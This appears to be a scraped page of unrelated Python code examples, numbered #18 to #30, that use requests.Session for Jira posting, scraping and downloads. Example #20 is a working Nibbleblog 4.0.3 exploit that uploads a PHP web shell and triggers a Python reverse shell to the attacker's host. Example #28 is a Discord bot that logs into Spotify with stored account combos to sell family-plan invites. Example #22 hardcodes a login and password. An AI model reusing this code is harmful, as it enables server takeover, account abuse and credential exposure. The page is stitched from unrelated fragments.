    if verbose:
        logger.debug(json.dumps(data, indent=4))

    if dry_run:
        logger.info("dry run. not posting")
    else:
        response = jira_session.post(config.jira_gitlab_listener_url,
                                     json=data,
                                     auth=(username, password))
        logger.info(response)

    jira_session.delete(config.jira_url + '/rest/auth/1/session',
                        auth=(username, password))
Exemple #18
0
def get_thermal(session=None):
    """
    Requests thermal generation data then parses and sorts by type.  Nuclear is included.
    Returns a dictionary.
    """

    #Need to persist session in order to get ControlID and ReportSession so we can send second request
    #for table data.  Both these variables change on each new request.
    s = session or requests.Session()
    r = s.get(url)
    pat = re.search("ControlID=[^&]*", r.text).group()
    spat = re.search("ReportSession=[^&]*", r.text).group()
    cid = pat.rpartition('=')[2]
    rs = spat.rpartition('=')[2]
    full_table = []

    #'En Reserva' plants are not generating and can be ignored.
    #The table has an extra column on 'Costo Operativo' page which must be removed to find power generated correctly.

    pagenumber = 1
    reserves = False

    while not reserves:
        t = s.get(turl, params = {'ControlID': cid, 'ReportSession': rs, 'PageNumber': '{}'.format(pagenumber)})
        text_only = webparser(t)
        if 'Estado' in text_only:
            for item in text_only:
                if len(item) == 1 and item in string.ascii_letters:
                    text_only.remove(item)
        if 'En Reserva' in text_only:
            reserves = True
            continue
        full_table.append(text_only)
        pagenumber += 1

    data = list(itertools.chain.from_iterable(full_table))
    formatted_data = dataformat(data)
    mapped_data = [power_plant_type.get(x,x) for x in formatted_data]

    for item in mapped_data:
        try:
            #avoids including titles and headings
            if all((item.isupper(), not item.isalpha(), not ' ' in item)):
                print '{} is missing from the AR plant mapping!'.format(item)
        except AttributeError:
            #not a string....
            continue

    find_totals = [i+1 for i,x in enumerate(mapped_data) if x == 'Totales ']
    thermal_generation = sum([mapped_data[i] for i in find_totals])

    find_nuclear = [i+2 for i, x in enumerate(mapped_data) if x == 'nuclear']
    nuclear_generation = sum([mapped_data[i] for i in find_nuclear])
    find_oil = [i+2 for i, x in enumerate(mapped_data) if x == 'oil']
    oil_generation = sum([mapped_data[i] for i in find_oil])
    find_coal = [i+2 for i, x in enumerate(mapped_data) if x == 'coal']
    coal_generation = sum([mapped_data[i] for i in find_coal])
    find_biomass = [i+2 for i, x in enumerate(mapped_data) if x == 'biomass']
    biomass_generation = sum([mapped_data[i] for i in find_biomass])
    find_gas = [i+2 for i, x in enumerate(mapped_data) if x == 'gas']
    gas_generation = sum([mapped_data[i] for i in find_gas])

    unknown_generation = (thermal_generation - nuclear_generation - gas_generation \
                          - oil_generation - coal_generation - biomass_generation)

    if unknown_generation < 0.0:
        unknown_generation = 0.0

    return {'gas': gas_generation,
            'nuclear': nuclear_generation,
            'coal': coal_generation,
            'unknown': unknown_generation,
            'oil': oil_generation,
            'biomass': biomass_generation
           }
Exemple #19
0
 def __init__(self, config):
     self.config = config
     self.session = requests.Session()
Exemple #20
0
def main():

    # args
    argparser = argparse.ArgumentParser(
        description='Nibbleblog 4.0.3 Shell Upload Exploit', add_help=False)
    main_arg = argparser.add_argument_group("MAIN")

    main_arg.add_argument('-h',
                          '--help',
                          help='Show this help menu',
                          action='store_true')

    main_arg.add_argument('--rhost',
                          type=str,
                          help='Nibbleblog host',
                          required=True)

    main_arg.add_argument('--lhost',
                          type=str,
                          help='Local host to receive reverse shell',
                          required=True)

    main_arg.add_argument(
        '--lport',
        type=str,
        help='Local port to receive reverse shell (default: 4444)',
        default='4444')

    main_arg.add_argument('--login',
                          type=str,
                          help='Nibbleblog login',
                          required=True)

    main_arg.add_argument('--password',
                          type=str,
                          help='Nibbles password',
                          required=True)

    main_arg.add_argument('--burpsuite',
                          action='store_true',
                          help='Enable burpsuite proxy')

    args = argparser.parse_args()

    # arg validation
    if args.help:
        argparser.print_help()
        sys.exit(1)

    # cons
    lhost = args.lhost
    lport = args.lport
    rhost = "http://" + args.rhost.replace('/', '')
    nibbleblog_login = args.login
    nibbleblog_password = args.password
    url_login = '******'.format(rhost)
    url_upload = '{}/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image'.format(
        rhost)
    url_webshell = '{}/nibbleblog/content/private/plugins/my_image/image.php?cmd=id'.format(
        rhost)
    burpsuite = args.burpsuite

    # req
    session = requests.Session()

    def login():

        post = {"username": nibbleblog_login, "password": nibbleblog_password}

        print(" [*] Sign-in using credentials...")

        try:
            r = session.post(url_login, data=post)
        except Exception as e:
            print(e)
        else:
            if "dashboard" in r.url:
                print(" [*] Logged with success!")
            else:
                print(
                    " [*] Failed to login with provided Nibbleblog credentials"
                )
                sys.exit(1)

    def exploit():

        with open('tmp_webshell.php', 'w') as f:
            f.write('<?php system($_GET["cmd"]) ?>')
            f.close()

        proxies = {"http": "127.0.0.1:8080"}

        headers = {
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
        }

        files = {
            "image": ("tmp_webshell.php", open("tmp_webshell.php",
                                               "rb"), "application/x-php")
        }

        multipart_form_data = {
            'controller': 'plugins',
            'plugin': 'my_image',
            'position': '4',
            'title': 'My image',
            'action': 'config',
            'caption': '',
            'image_resize': '1',
            'image_width': '230',
            'image_height': '200',
            'image_option': 'auto'
        }

        try:
            if burpsuite:
                r = session.post(url_upload,
                                 data=multipart_form_data,
                                 headers=headers,
                                 files=files,
                                 proxies=proxies)
            else:
                r = session.post(url_upload,
                                 data=multipart_form_data,
                                 headers=headers,
                                 files=files)

        except Exception as e:
            print(e)
        else:
            if 'successfully' in r.text:
                print(" [*] Web shell successfully uploaded, check at: {}".
                      format(url_webshell))
                print(" [*] Cleaning temporary web shell...")
                os.remove("tmp_webshell.php")
                print(
                    " [*] Setting up reverse shell using LHOST {} and LPORT {} ..."
                    .format(lhost, lport))
                rshell_payload = """;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{}",{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' """.format(
                    lhost, lport)
                print(
                    " [*] In 10 seconds a connection will be received, run on a new terminal: nc -lvp {} and wait :)"
                    .format(lport))
                sleep(10)
                print(" [*] Reverse shell connection spawned!")

                try:
                    r = requests.get("{}{}".format(url_webshell,
                                                   rshell_payload))
                except Exception as e:
                    print(e)

            else:
                print("[*] Failed to upload web shell :(")
                sys.exit(1)

    # main
    print(" [>] Nibbleblog 4.0.3 Shell Upload Exploit")
    print(" [*] Exploit author: Curesec Research Team")
    print(" [*] Python script exploit author: nullarmor")

    login()
    exploit()
Exemple #21
0
    def __init__(self, app_key, app_secret, oauth_token, oauth_token_secret,
                 timeout=300, retry_count=None, retry_in=10, client_args=None,
                 handlers=None, chunk_size=1):
        """Streaming class for a friendly streaming user experience
        Authentication IS required to use the Twitter Streaming API

        :param app_key: (required) Your applications key
        :param app_secret: (required) Your applications secret key
        :param oauth_token: (required) Used with oauth_token_secret to make
                            authenticated calls
        :param oauth_token_secret: (required) Used with oauth_token to make
                                   authenticated calls
        :param timeout: (optional) How long (in secs) the streamer should wait
                        for a response from Twitter Streaming API
        :param retry_count: (optional) Number of times the API call should be
                            retired
        :param retry_in: (optional) Amount of time (in secs) the previous
                         API call should be tried again
        :param client_args: (optional) Accepts some requests Session
                            parameters and some requests Request parameters.
                            See
                            http://docs.python-requests.org/en/latest/api/#sessionapi
                            and requests section below it for details.
                            [ex. headers, proxies, verify(SSL verification)]
        :param handlers: (optional) Array of message types for which
                         corresponding handlers will be called

        :param chunk_size: (optional) Define the buffer size before data is
                           actually returned from the Streaming API. Default: 1
        """

        self.auth = OAuth1(app_key, app_secret,
                           oauth_token, oauth_token_secret)

        self.client_args = client_args or {}
        default_headers = {'User-Agent': 'Twython Streaming v' + __version__}
        if 'headers' not in self.client_args:
            # If they didn't set any headers, set our defaults for them
            self.client_args['headers'] = default_headers
        elif 'User-Agent' not in self.client_args['headers']:
            # If they set headers, but didn't include User-Agent..
            # set it for them
            self.client_args['headers'].update(default_headers)
        self.client_args['timeout'] = timeout

        self.client = requests.Session()
        self.client.auth = self.auth
        self.client.stream = True

        # Make a copy of the client args and iterate over them
        # Pop out all the acceptable args at this point because they will
        # Never be used again.
        client_args_copy = self.client_args.copy()
        for k, v in client_args_copy.items():
            if k in ('cert', 'headers', 'hooks', 'max_redirects', 'proxies'):
                setattr(self.client, k, v)
                self.client_args.pop(k)  # Pop, pop!

        self.api_version = '1.1'

        self.retry_in = retry_in
        self.retry_count = retry_count

        # Set up type methods
        StreamTypes = TwythonStreamerTypes(self)
        self.statuses = StreamTypes.statuses

        self.connected = False

        self.handlers = handlers if handlers else \
            ['delete', 'limit', 'disconnect']

        self.chunk_size = chunk_size
    def handle(self, *args, **options):
        while True:
            try:
                self.logger.debug('=' * columns)
                for slave in Slave.objects.all():
                    self.logger.debug('_' * columns)
                    self.logger.debug('slave: #{0} {1}'.format(slave.id, slave.ip))
                    tasks = Task.objects.filter(available=True, slave=slave)
                    if len(tasks):
                        self.logger.debug('queue: {}'.format(', '.join(map(lambda x: str(x.id), tasks))))

                        self.logger.debug('[**********fetch EB number**********]')
                        for task in tasks:
                            self.fetch_eb_number(task)

                        for i in range(len(tasks)):
                            task = tasks[i]
                            task_logger = Logger.objects.filter(task=task) if Logger.objects.filter(task=task) else None
                            test_id = None
                            self.logger.debug('current task: #{0} {1}'.format(task.id, task.test_config))
                            cfg_detail = json.load(open(os.path.join(config_dir, task.test_config), 'r'))
                            self.logger.debug('type: {0}'.format(cfg_detail['tag']))

                            # check slave status
                            try:
                                session = requests.Session()
                                session.trust_env = False
                                url = 'http://{}:9001/stat/'.format(slave.ip)
                                stat = json.loads(requests.get(url, timeout=5).text)
                            except Exception as e:
                                self.logger.debug(e)
                                self.logger.debug('slave is offline, skip')
                                break

                            # build with all patch
                            if cfg_detail['patch_method'] == 'bap':
                                self.logger.debug('test method: {0}'.format('bap'))
                                self.logger.debug('project: {0}'.format(cfg_detail['project_name']))
                                project = cfg_detail['project_name']
                                builder = Project.objects.get(name=project).builder_name
                                buildbot_link = base_buildbot_link.format(builder)
                                building_list = json.loads(requests.get(buildbot_link, verify=False).text)['currentBuilds']
                                query_attrs = '&'.join(map(lambda x: 'select='+str(x), building_list))

                                building_info_url = buildbot_link + 'builds?' + query_attrs
                                building_info = json.loads(requests.get(building_info_url, verify=False).content)

                                # if config base build is not exist
                                if 'base_build' not in cfg_detail:
                                    self.logger.debug('searching EB number with reason: %s' % task.test_config)

                                    for k, v in building_info.items():
                                        if v is None or 'properties' not in v:
                                            continue
                                        for item in v['properties']:
                                            if task.test_config in item:
                                                self.logger.debug('new eb: %s' % k)
                                                with open(os.path.join(config_dir, task.test_config), 'w') as fs:
                                                    cfg_detail['base_build'] = cfg_detail['build']
                                                    cfg_detail['build'] = k
                                                    cfg_detail['build_url'] = BuildPath.objects.get(project__name=cfg_detail['project_name'], build_type=0).url
                                                    fs.write(json.dumps(cfg_detail))
                                                    fs.close()
                                    break

                                # check eb status
                                else:
                                    eb_url = '{0}builds/{1}'.format(buildbot_link, cfg_detail['build'])
                                    status = json.loads(requests.get(eb_url, verify=False).content)['text']
                                    self.logger.debug('EB {0} status: {1}'.format(cfg_detail['build'], status))
                                    if len(status) == 0:
                                        task_logger.update(description='bp')
                                        task_logger.update(build=cfg_detail['build'])
                                        continue
                                    elif status[1] == 'successful' or status[1] == 'Exception occured!':
                                        task_logger.update(description='bs')
                                        test_id = self.new_test_id()
                                    elif status[0] in ['failed', 'exception']:
                                        tasks.update(available=False, comment=status[2])
                                        task_logger.update(description='bf')
                                        continue
                                    else:
                                        self.logger.debug('skip this task\n')
                                        continue

                            # test directly
                            elif cfg_detail['patch_method'] == 'td':
                                # send task
                                test_id = self.new_test_id()

                            # slave is online
                            if 'atf_task_id' in stat:
                                if stat['atf_task_id'] != 'None' and stat['atf_task_id'] != '':
                                    self.logger.debug('atf_task_id: ' + stat['atf_task_id'])
                                    self.logger.debug('slave is busy')
                                    break
                                if cfg_detail['building'] == True:
                                    build_type_id = cfg_detail['build_type_id']
                                    project_id = cfg_detail['project_id']
                                    buildpath = BuildPath.objects.get(build_type=build_type_id, project__id=project_id)
                                    self.logger.debug('buildpath id:' + str(buildpath.id))
                                    buildbot_link = buildpath.buildbot_link
                                    self.logger.debug('buildbot: ' + buildbot_link)
                                    builder = re.search(r'builders/(.+)', buildbot_link).group(1)
                                    buildbot = Buildbot(builder, auth=('weiyunyx', 'ZAQxsw@123456'))
                                    status = buildbot.check_build_status(cfg_detail['build'])
                                    if status['finished']:
                                        if status['status'] in ['success', 'warnings', 'exception']:
                                            task_logger.update(description='bs')
                                        else:
                                            task.available = False
                                            task.save()
                                            task_logger.update(description='bf')
                                            self.logger.debug('build failed')
                                            break
                                    else:
                                        self.logger.debug('building')
                                        continue
                            else:
                                self.logger.debug('slave has no redis server')
                                break

                            # send task to slave
                            self.logger.debug('slave: #{0} {1}, {2} in queue'.format(slave.id, slave.ip, len(tasks)))
                            self.logger.debug('recent task({0}): {1}'.format(task.id, task.test_config))
                            self.logger.debug('type: {0}'.format(cfg_detail['tag']))
                            self.logger.debug('build: {0}'.format(cfg_detail['build']))
                            self.logger.debug('send task to slave')

                            if test_id is not None:
                                self.create_raw_folder(test_id=test_id, project=cfg_detail['project_name'], build=cfg_detail['build'])
                                url = '/'.join(['http:/', slave.ip + ':9001', 'test/'])
                                data = urllib.urlencode({
                                    'test_config': task.test_config,
                                    'task_id': task.id,
                                    'test_id': test_id
                                })
                                self.logger.debug(data)
                                if urllib2.urlopen(url, data, timeout=1).read() == 'Aye Sir':
                                    print 'task sent'
                                    task.test_id = test_id
                                    task.available = False
                                    task.start()
                                    task.save()
                                    time.sleep(1)
                                break
                    else:
                        self.logger.debug('No tasks, skip')
            except Exception as e:
                exc_type, exc_obj, exc_tb = sys.exc_info()
                fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
                print exc_type, fname, exc_tb.tb_lineno
                print e
            time.sleep(timeout)
Exemple #23
0
def home(request):
    """
    Parameters:
    request[HttpRequest]
    --------------------------------------------
    Returns:
    render(request, 'init.html') [HttpResponse] => init.html is returned as HttpResponse
    Logic:
    it takes the inputted code from frontend request and sends it to hackerearth API
    if the code doesn't compile, then it finds the necessary keyword from error messages
    and searches for it on google with regex matching and suggests debug links
    """


    if request.method == 'POST':
        # POST goes here . is_ajax is must to capture ajax requests.
        if request.is_ajax():
            lang = request.POST.get('lang')
            source = request.POST.get('source')
            inputl = request.POST.get('input')
            data = {"lang": lang, "source": source, "input": inputl}

            data = {
                'client_secret': CLIENT_SECRET,
                'async': 0,
                'source': source,
                'lang': lang,
                'input': inputl,
                'time_limit': 5,
                'memory_limit': 262144,
            }

            # Post data to HackerEarth API
            s = requests.Session()
            s.mount("http://", requests.adapters.HTTPAdapter(max_retries=5))
            s.mount("https://", requests.adapters.HTTPAdapter(max_retries=5))
            r = s.post(RUN_URL, data=data)

            key_words = []
            compile_status = r.json()['compile_status'].strip()
            current_json = r.json()
            if compile_status != 'OK':
                rk = Rake()
                rk.extract_keywords_from_text(compile_status)
                for keyword in rk.get_ranked_phrases():
                    if 'hackerearth' in keyword:
                        continue
                    key_words.append(keyword)

                # filter extra information
                if len(key_words) >= 3:
                    key_words = key_words[-2:]
                key_words = list(reversed(key_words))
                key_words.append(compile_status)

                links = []
                desc = []
                import re
                for word in key_words:
                    page = s.get("https://www.google.co.in/search?q=" + word)
                    soup = BeautifulSoup(page.content, 'lxml')
                    for link in soup.find_all("a", href=re.compile("(?<=/url\?q=)(htt.*://.*)")):
                        debug_url = link["href"].replace("/url?q=", "").split('&')[0]
                        if 'webcache.googleusercontent.com' in debug_url:
                            continue
                        links.append(debug_url)
                        desc.append(link.text + ":" + get_domain(debug_url))

                current_json['debug_urls'] = links[:10]
                current_json['descriptions'] = desc[:10]
            return JsonResponse(current_json, safe=False)

    # A normal get request goes here
    return render(request, 'init.html')
 def __init__(self, **kwargs):
     for key, value in kwargs.items(): setattr(self, key, value)
     self.info = 'login in bilibili in scanqr mode'
     self.cur_path = os.getcwd()
     self.session = requests.Session()
     self.__initialize()
def main():
    # Get command line arguments
    keyword, number_of_results, save_database, path, sortby_column, plot_results, start_year, end_year, debug = get_command_line_args()

    # Create main URL based on command line arguments
    if start_year:
        GSCHOLAR_MAIN_URL = GSCHOLAR_URL + STARTYEAR_URL.format(start_year)
    else:
        GSCHOLAR_MAIN_URL = GSCHOLAR_URL

    if end_year != now.year:
        GSCHOLAR_MAIN_URL = GSCHOLAR_MAIN_URL + ENDYEAR_URL.format(end_year)

    if debug:
        GSCHOLAR_MAIN_URL='https://web.archive.org/web/20210314203256/'+GSCHOLAR_URL

    # Start new session
    session = requests.Session()
    #headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}

    # Variables
    links = []
    title = []
    citations = []
    year = []
    author = []
    rank = [0]

    # Get content from number_of_results URLs
    for n in range(0, number_of_results, 10):
        #if start_year is None:
        url = GSCHOLAR_MAIN_URL.format(str(n), keyword.replace(' ','+'))
        if debug:
            print("Opening URL:", url)
        #else:
        #    url=GSCHOLAR_URL_YEAR.format(str(n), keyword.replace(' ','+'), start_year=start_year, end_year=end_year)

        print("Loading next {} results".format(n+10))
        page = session.get(url)#, headers=headers)
        c = page.content
        if any(kw in c.decode('ISO-8859-1') for kw in ROBOT_KW):
            print("Robot checking detected, handling with selenium (if installed)")
            try:
                c = get_content_with_selenium(url)
            except Exception as e:
                print("No success. The following error was raised:")
                print(e)

        # Create parser
        soup = BeautifulSoup(c, 'html.parser')

        # Get stuff
        mydivs = soup.findAll("div", { "class" : "gs_r" })

        for div in mydivs:
            try:
                links.append(div.find('h3').find('a').get('href'))
            except: # catch *all* exceptions
                links.append('Look manually at: '+url)

            try:
                title.append(div.find('h3').find('a').text)
            except:
                title.append('Could not catch title')

            try:
                citations.append(get_citations(str(div.format_string)))
            except:
                warnings.warn("Number of citations not found for {}. Appending 0".format(title[-1]))
                citations.append(0)

            try:
                year.append(get_year(div.find('div',{'class' : 'gs_a'}).text))
            except:
                warnings.warn("Year not found for {}, appending 0".format(title[-1]))
                year.append(0)

            try:
                author.append(get_author(div.find('div',{'class' : 'gs_a'}).text))
            except:
                author.append("Author not found")

            rank.append(rank[-1]+1)

        # Delay 
        sleep(0.5)

    # Create a dataset and sort by the number of citations
    data = pd.DataFrame(list(zip(author, title, citations, year, links)), index = rank[1:],
                        columns=['Author', 'Title', 'Citations', 'Year', 'Source'])
    data.index.name = 'Rank'

    # Add columns with number of citations per year
    data['cit/year']=data['Citations']/(end_year + 1 - data['Year'])
    data['cit/year']=data['cit/year'].round(0).astype(int)

    # Sort by the selected columns, if exists
    try:
        data_ranked = data.sort_values(by=sortby_column, ascending=False)
    except Exception as e:
        print('Column name to be sorted not found. Sorting by the number of citations...')
        data_ranked = data.sort_values(by='Citations', ascending=False)
        print(e)

    # Print data
    print(data_ranked)

    # Plot by citation number
    if plot_results:
        plt.plot(rank[1:],citations,'*')
        plt.ylabel('Number of Citations')
        plt.xlabel('Rank of the keyword on Google Scholar')
        plt.title('Keyword: '+keyword)
        plt.show()

    # Save results
    if save_database:
        fpath_csv = os.path.join(path,keyword.replace(' ','_')+'.csv')
        fpath_csv = fpath_csv[:MAX_CSV_FNAME]
        data_ranked.to_csv(fpath_csv, encoding='utf-8')
 def __init__(self, **kwargs):
     for key, value in kwargs.items(): setattr(self, key, value)
     self.info = 'login in bilibili in mobile mode'
     self.session = requests.Session()
     self.__initialize()
Exemple #27
0
def get_session():
    if not getattr(thread_local, "session", None):
        thread_local.session = requests.Session()
    return thread_local.session
Exemple #28
0
async def redeem(ctx, arg1, arg2, arg3):
    await client.delete_message(ctx.message)
    allowed_countries = [
        'US', 'GB', 'DE', 'CA', 'AU', 'IT', 'NZ', 'MX', 'BE', 'FR', 'ID', 'SG',
        'BR', 'MY', 'PT', 'IL', 'DK', 'NL', 'ES', 'SE', 'NO', 'TR', 'TH', 'HU'
    ]
    accounts = []
    keys = []
    country = arg1.upper()
    keyGrab(keys)
    if country in allowed_countries:
        f = open('Accounts/' + str(country) + '.txt', 'r')
        for line in f:
            clean = line.split('\n')
            accounts.append(clean[0])

        f.close()
    if country not in allowed_countries:
        return await (client.say(
            'Sorry But the Country you Specified is Not Currently Offered'))
    if arg3 not in keys:
        return await (
            client.say('Sorry but you entered an invalid product key.'))
    if arg3 in keys:
        keys.remove(arg3)
        check = re.compile(
            '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)')
        mat = check.match(str(arg2))
        if mat:
            result = None
            while result != ',"success":true}':
                if len(accounts) == 0:
                    await client.say(
                        'Sorry We Are Out of Stock on That Country')
                    os.remove('Accounts/' + str(country) + '.txt')
                    f = open('Accounts/' + str(country) + '.txt', 'a')
                    for ELEM in accounts:
                        f.write(ELEM + '\n')

                    f.close()
                    break
                account = accounts.pop()
                combo = account.split(':')
                USER = combo[0]
                PASS = combo[1]
                try:
                    with requests.Session() as (c):
                        url = 'https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fint%2Faccount%2Foverview%2F'
                        headers = {
                            'Accept':
                            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                            'User-Agent':
                            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'
                        }
                        page = c.get(url, headers=headers)
                        CSRF = page.cookies['csrf_token']
                        headers = {
                            'Accept':
                            '*/*',
                            'User-Agent':
                            'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1',
                            'Referer':
                            'https://accounts.spotify.com/en/login/?continue=https:%2F%2Fwww.spotify.com%2Fus%2Fgooglehome%2Fregister%2F&_locale=en-US'
                        }
                        url = 'https://accounts.spotify.com/api/login'
                        login_data = {
                            'remember': 'true',
                            'username': USER,
                            'password': PASS,
                            'csrf_token': CSRF
                        }
                        cookies = dict(
                            __bon=
                            'MHwwfC0xNDAxNTMwNDkzfC01ODg2NDI4MDcwNnwxfDF8MXwx')
                        login = c.post(url,
                                       headers=headers,
                                       data=login_data,
                                       cookies=cookies)
                        if '{"displayName":"' in login.text:
                            url = 'https://www.spotify.com/us/account/overview/'
                            capture = c.get(url, headers=headers)
                            csr = capture.headers['X-Csrf-Token']
                            url = 'https://www.spotify.com/us/family/api/master-invite-by-email/'
                            headers = {
                                'Accept': '*/*',
                                'User-Agent':
                                'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1',
                                'x-csrf-token': csr
                            }
                            login_data = {
                                'firstName': 'thomas',
                                'lastName': 'Payne',
                                'email': arg2
                            }
                            invite = c.post(url,
                                            headers=headers,
                                            json=login_data)
                            print(invite.text)
                            if '"success":true}' in invite.text:
                                await client.say(
                                    arg2 +
                                    ' has been successfully invited to a ' +
                                    country + ' Family Plan')
                                accounts.append(combo[0] + ':' + combo[1])
                                print(combo[0] + ':' + combo[1])
                                keyRemove(keys)
                                result = ',"success":true}'
                                channel = discord.utils.get(
                                    ctx.message.server.channels, name='logs')
                                await client.send_message(
                                    channel, arg2 + ' has been invited to a ' +
                                    country + ' Plan | using the key: ' +
                                    arg3 + ' | invited by the account: ' +
                                    combo[0] + ':' + combo[1] +
                                    ' | USER Who Redeemed Key: ' +
                                    str(ctx.message.author))
                                os.remove('Accounts/' + str(country) + '.txt')
                                f = open('Accounts/' + str(country) + '.txt',
                                         'a')
                                for ELEM in accounts:
                                    f.write(ELEM + '\n')

                                f.close()
                                break
                            if 'message":"Invite limit reached' in invite.text:
                                result = None
                            if 'message":"No family plan found for user' in invite.text:
                                result = None
                        if '{"error":"errorInvalidCredentials"}' in login.text:
                            result = None
                except:
                    pass

        if not mat:
            return await (client.say('Sorry But an Invalid Email Was Given'))
Exemple #29
0
payloadHeader = {
    "User-Agent":
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
}

param = {
    'name': '',
    'idcardno': '',
    'isLoss': '',
    'province': '',
    'hasCollection': '',
    'page': '1',
    'num': '20'
}

s = requests.Session()

s.get('https://www.bjp2p.com.cn/index', headers=payloadHeader)
s.get('https://www.bjp2p.com.cn/malice/maliceList', headers=payloadHeader)

resp = s.post(url, data=param, timeout=3, verify=False, proxies=proxy).text
resp_dic = json.loads(resp).get('maliceList')

# 解析
page_num = 1
df_total = pd.DataFrame()


def get_content(page_num, proxy, df_total):
    #flag = True
    import random
Exemple #30
0
  def _sync_download(self, url, destination_path):
    """Synchronous version of `download` method."""
    proxies = {
        'http': os.environ.get('TFDS_HTTP_PROXY', None),
        'https': os.environ.get('TFDS_HTTPS_PROXY', None),
        'ftp': os.environ.get('TFDS_FTP_PROXY', None)
    }
    if kaggle.KaggleFile.is_kaggle_url(url):
      if proxies['http']:
        os.environ['KAGGLE_PROXY'] = proxies['http']
      return self._sync_kaggle_download(url, destination_path)

    try:
      # If url is on a filesystem that gfile understands, use copy. Otherwise,
      # use requests.
      if not url.startswith('http'):
        return self._sync_file_copy(url, destination_path)
    except tf.errors.UnimplementedError:
      pass

    session = requests.Session()
    session.proxies = proxies
    if _DRIVE_URL.match(url):
      url = self._get_drive_url(url, session)
    use_urllib = url.startswith('ftp')
    if use_urllib:
      if proxies['ftp']:
        proxy = urllib.request.ProxyHandler({'ftp': proxies['ftp']})
        opener = urllib.request.build_opener(proxy)
        urllib.request.install_opener(opener)   # pylint: disable=too-many-function-args
      request = urllib.request.Request(url)
      response = urllib.request.urlopen(request)
    else:
      response = session.get(url, stream=True)
      if response.status_code != 200:
        raise DownloadError('Failed to get url %s. HTTP code: %d.' %
                            (url, response.status_code))
    fname = _get_filename(response)
    path = os.path.join(destination_path, fname)
    size = 0

    size_mb = 0
    unit_mb = units.MiB
    self._pbar_dl_size.update_total(
        int(response.headers.get('Content-length', 0)) // unit_mb)
    with tf.io.gfile.GFile(path, 'wb') as file_:
      checksum = self._checksumer()
      if use_urllib:
        iterator = iter(lambda: response.read(io.DEFAULT_BUFFER_SIZE), b'')
      else:
        iterator = response.iter_content(chunk_size=io.DEFAULT_BUFFER_SIZE)

      for block in iterator:
        size += len(block)

        # Update the progress bar
        size_mb += len(block)
        if size_mb > unit_mb:
          self._pbar_dl_size.update(size_mb // unit_mb)
          size_mb %= unit_mb

        checksum.update(block)
        file_.write(block)
    self._pbar_url.update(1)
    return checksum.hexdigest(), size